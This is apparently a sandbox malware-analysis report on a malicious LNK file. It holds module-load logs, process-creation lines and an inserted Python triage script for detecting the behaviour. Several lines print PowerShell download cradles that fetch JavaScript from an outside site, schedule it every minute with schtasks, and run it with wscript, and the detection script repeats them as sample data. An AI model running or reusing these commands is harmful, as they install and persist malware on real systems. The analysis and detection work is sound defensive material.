Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
      Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
      Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
      Source: yT6gJFN0SR.lnk | LNK file: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\wscript.exe | Automated click: OK
      Source: C:\Windows\System32\wscript.exe | Automated click: OK
      Source: C:\Windows\System32\wscript.exe | Automated click: OK
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

      Data Obfuscation

      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC7A0953 push E95B2FD0h; ret 0_2_00007FFAAC7A09C9

      Persistence and Installation Behavior

      Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (7 identical events)
      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;

      Boot Survival

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8
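The process-creation lines under Data Obfuscation and the resolved schtasks.exe call under Boot Survival show three things a triage script has to normalise before any string match works: PowerShell binds any unambiguous prefix of a parameter name, so -comman, -outfi and -usebasi are accepted as -Command, -OutFile and -UseBasicParsing; the first stage is a WebClient download cradle and the second an Invoke-WebRequest one; and the persistence is a task that re-runs wscript on a .js in %TEMP% every minute, whose action prefix ($cio) is fetched from the server at run time, so the string "wscript" never appears in the LNK and only shows up in the resolved schtasks.exe command line. The following Python is an added example written for this page; it is not part of the Joe Sandbox report or of the sample. It feeds the three command lines quoted in the report, embedded inline as constructed sample events, through that normalisation and returns the findings. The parameter-name list, the writable-directory fragments and the "rapid trigger" threshold are assumptions chosen for the example, not an exhaustive reference.

```python
"""Added example: normalise the report's process-creation lines and flag the
download cradle, the minute-interval task and the script host run from a
user-writable directory. Parameter and directory lists are assumptions."""
import re

# PowerShell binds any unambiguous prefix of a parameter name, so "-comman",
# "-outfi" and "-usebasi" bind to -Command, -OutFile and -UseBasicParsing.
PS_PARAMS = ("Command", "EncodedCommand", "ExecutionPolicy", "NoProfile",
             "NonInteractive", "WindowStyle", "File", "OutFile",
             "UseBasicParsing", "Uri")
# Lower-cased fragments of locations a standard user can write to (assumed).
WRITABLE_DIRS = ("\\appdata\\local\\temp", "\\programdata", "\\users\\public",
                 "$env:tmp", "$env:temp", "$env:programdata", "$env:appdata")
CRADLE = re.compile(r"Net\.WebClient|Download(?:File|Data|String)|Invoke-WebRequest"
                    r"|\bIWR\b|Invoke-RestMethod|Start-BitsTransfer", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)
SCRIPT_HOST = re.compile(r"\b(?:wscript|cscript)(?:\.exe)?\s+\"?([^\s\"]+)", re.I)

def expand_abbreviated_params(cmd):
    """Rewrite each '-prefix' token that matches exactly one known parameter."""
    def repl(m):
        hits = [p for p in PS_PARAMS if p.lower().startswith(m.group(1).lower())]
        return "-" + hits[0] if len(hits) == 1 else m.group(0)
    # The look-behind leaves hyphens inside words and URLs (wp-content, New-Object) alone.
    return re.sub(r"(?<![\w./:\\])-([A-Za-z]{2,})\b", repl, cmd)

def download_cradle(cmd):
    """URLs fetched by the line, or [] when it has no download primitive."""
    return URL.findall(cmd) if CRADLE.search(cmd) else []

def _task_action(rest):
    """(/tr argument, is_dynamic): a quoted string, a bare token, or a
    parenthesised PowerShell expression that is only resolved at run time."""
    m = re.search(r"/tr\s+", rest, re.I)
    if not m:
        return None, False
    i = m.end()
    if rest[i] == '"':
        j = rest.find('"', i + 1)
        return rest[i + 1:(j if j != -1 else None)], False
    if rest[i] == "(":
        depth = 0
        for j in range(i, len(rest)):
            depth += {"(": 1, ")": -1}.get(rest[j], 0)
            if depth == 0:
                return rest[i:j + 1], True
        return rest[i:], True
    return re.match(r"\S+", rest[i:]).group(0), False

def parse_schtasks_create(cmd):
    """Fields of a 'schtasks /create' call, or None if the line has none."""
    m = re.search(r"schtasks(?:\.exe)?\"?\s+/create\b(.*)", cmd, re.I | re.S)
    if not m:
        return None
    rest = m.group(1)
    sc = re.search(r"/sc\s+(\w+)", rest, re.I)
    mo = re.search(r"/mo\s+(\d+)", rest, re.I)
    tn = re.search(r"/tn\s+\"?([^\s\";]+)", rest, re.I)
    tr, dynamic = _task_action(rest)
    return {"sc": sc.group(1).lower() if sc else None,
            "mo": int(mo.group(1)) if mo else None,
            "tn": tn.group(1) if tn else None, "tr": tr, "dynamic_action": dynamic}

def task_is_suspicious(task):
    """Minute-interval trigger plus a script host staged in a writable
    directory, or an action that cannot be read from the command line."""
    rapid = task["sc"] == "minute" and task["mo"] is not None and task["mo"] <= 5
    action = (task["tr"] or "").lower()
    hosts = ("wscript", "cscript", "powershell", "mshta", "rundll32", "regsvr32")
    staged = any(d in action for d in WRITABLE_DIRS) and any(h in action for h in hosts)
    return rapid and (staged or task["dynamic_action"])

def script_host_from_writable_dir(cmd):
    """Script path when wscript/cscript is launched from a writable directory."""
    m = SCRIPT_HOST.search(cmd)
    if m and any(d in m.group(1).lower() for d in WRITABLE_DIRS):
        return m.group(1)
    return None

def triage(events):
    """Normalise each (name, command line) pair and collect the findings."""
    out = []
    for name, raw in events:
        cmd = expand_abbreviated_params(raw)
        task = parse_schtasks_create(cmd)
        out.append({"event": name, "normalized": cmd,
                    "download_urls": download_cradle(cmd), "task": task,
                    "task_suspicious": bool(task and task_is_suspicious(task)),
                    "script_host_in_writable_dir": script_host_from_writable_dir(cmd)})
    return out

# Constructed sample: the three command lines quoted in this report. In the first
# the task action's leading text is downloaded ($cio) and prepended at run time;
# the resolved schtasks.exe line shows it decoded to "wscript ".
SAMPLE_EVENTS = [
    ("lnk_powershell", r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;'''),
    ("schtasks_resolved", r'''"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8'''),
    ("stage2_powershell", r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "'''),
]
```

Calling triage(SAMPLE_EVENTS) returns one finding per event: the LNK stage is reported as a two-URL cradle creating a minute-interval task whose action is computed at run time, the resolved schtasks.exe line as a minute-interval task running wscript from the user's Temp directory, and the second stage as an Invoke-WebRequest cradle that launches wscript from ProgramData. In practice the events list would come from Sysmon event 1 or Security event 4688 command lines; the prefix expansion is what keeps a rule written against "-Command" or "-OutFile" from being bypassed by the truncated spellings this sample uses.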
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (84 identical events)
      Source: C:\Windows\System32\schtasks.exe Process information set: NOOPENFILEERRORBOX (4 identical events)
      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 identical events)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (85 identical events)
      Source: C:\Windows\System32\schtasks.exe Process information set: NOOPENFILEERRORBOX (4 identical events)
      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (8 identical events)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (50 identical events)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
